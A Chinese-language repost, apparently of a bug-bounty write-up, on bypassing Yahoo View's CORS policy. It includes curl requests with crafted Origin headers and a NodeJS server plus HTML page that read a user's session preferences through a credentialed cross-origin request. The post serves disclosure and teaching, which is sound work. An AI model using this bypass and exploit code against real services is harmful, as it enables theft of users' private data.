我如何繞過Yahoo以及View的CORS限制策略是什么

這篇文章將為大家詳細講解有關我如何繞過Yahoo以及View的CORS限制策略是什么，文章內容質量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

由于Yahoo!View存在不規范的CORS方式，允許遠程攻擊者繞過其中的同源策略，通過特制請求繞過擬定頁面內容限制，獲取相應的目標主機返回響應。

CORS策略

通過Burp Suite被動監測功能發現，網站還對API https://api.view.yahoo.com發起請求，另外還存在跨域資源共享（CORS）策略。根據Mozilla開發者網絡文檔介紹，CORS使用附加HTTP頭的方式，允許用戶端獲得同一服務器不同域資源的訪問權限，它定義了在跨域訪問資源時瀏覽器和服務器之間的通信機制。

當瀏覽器實施同源策略（Same-Origin）時，它只接收AJAX方式對同源資源的數據獲取請求，而跨域資源共享（CORS）策略則允許在指定站點外進行數據共享。

Burp測試

在Burp中最開始的API請求如下：

GET /api/session/preferences HTTP/1.1
Host: api.view.yahoo.com
------- snip -------
origin: https://view.yahoo.com

服務端響應如下：

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
------- snip -------
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://view.yahoo.com

由于服務端對origin端有響應且允許請求帶有驗證信息（Access-Control-Allow-Credentials）的設置為True，這樣一來，我們就能從其驗證信息（如cookie）中竊取敏感信息了。

首先，我嘗試向API發送一個名為sxcurity.pro的請求源：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://sxcurity.pro'

隨后，服務端響應中不包含Allow-Origin and Allow-Credentials；接下來，我嘗試向API發送一個名為view.sxcurity.pro的請求源：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.sxcurity.pro'

可還是沒有任何響應；我突發奇想，能不能用view.yahoo.com.sxcurity.pro作請求源呢？：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com.sxcurity.pro'

但，還是沒Access-Control-Allow-Credentials或Access-Control-Allow-Origin響應，請求源變化為view.yahoo.comsxcurity.pro也無濟于事。正當我要放棄時，我想到了同時對兩個請求源發起請求：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com sxcurity.pro'

出乎意料，服務端竟然有了響應：

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
------- snip -------
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://view.yahoo.com sxcurity.pro

我很好奇，試圖想出一種方法，來把它變為一個有效的請求域名以便進行后期利用，我嘗試向兩個域名之間填充一些字符，以查看服務端的響應情況，如：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com%sxcurity.pro'

服務端響應如下：

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
------- snip -------
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://view.yahoo.com%sxcurity.pro

雖然有所響應，但由于請求源的域名無效，還是不能利用。

峰回路轉

在一番請教之后，我的一個朋友告訴我，可以參考他在HackerOne提交過的一個漏洞，他在其中使用了URL編碼符%60作為填充符，能有效繞過目標網站CORS策略，因此我豁然開朗，也在此利用%60作為填充符來試試：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com%60cdl.sxcurity.pro'

這里竟然也能奏效：

Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://view.yahoo.com%60cdl.sxcurity.pro

于是乎，我在我的亞馬遜 Route 53上設置了相應的通配符域名，打開Firefox瀏覽http://view.yahoo.com%60cdl.hack-r.be，不行，這....，由于不同瀏覽器保護策略不同，用Chrome、IE、Edge也都不行！用Mac的Safari竟然可以??！，雖然Apache會把它誤認為是一個服務端錯誤。

隨后，我想到了用NodeJS和index.html的配合來實現漏洞利用，NodeJS的server.js如下：

const http = require('http')
const port = 6299
const fs = require("fs");
const requestHandler = (request, response) => {
  fs.readFile("index.html", function(err, data){
  response.writeHead(200, {'Content-Type': 'text/html'});
  response.write(data);
  response.end();
});
}
const server = http.createServer(requestHandler)
server.listen(port, (err) => {
  if (err) {
    return console.log('[+] ruh roh! something went wrong :(', err)
  }
  console.log(`[+] server is listening on port ${port}`)
})

index.html如下：

<!DOCTYPE html>
<html>
<head><title>CORS</title></head>
<body>
<center>
<h3>Yahoo CORs Exploit</h3>
<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("pwnz").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "http://api.view.yahoo.com/api/session/preferences", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>

最終，可以成功通過瀏覽http://view.yahoo.com%60cdl.hack-r.be，獲取到api.view.yahoo.com的一些相關信息。

關于我如何繞過Yahoo以及View的CORS限制策略是什么就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。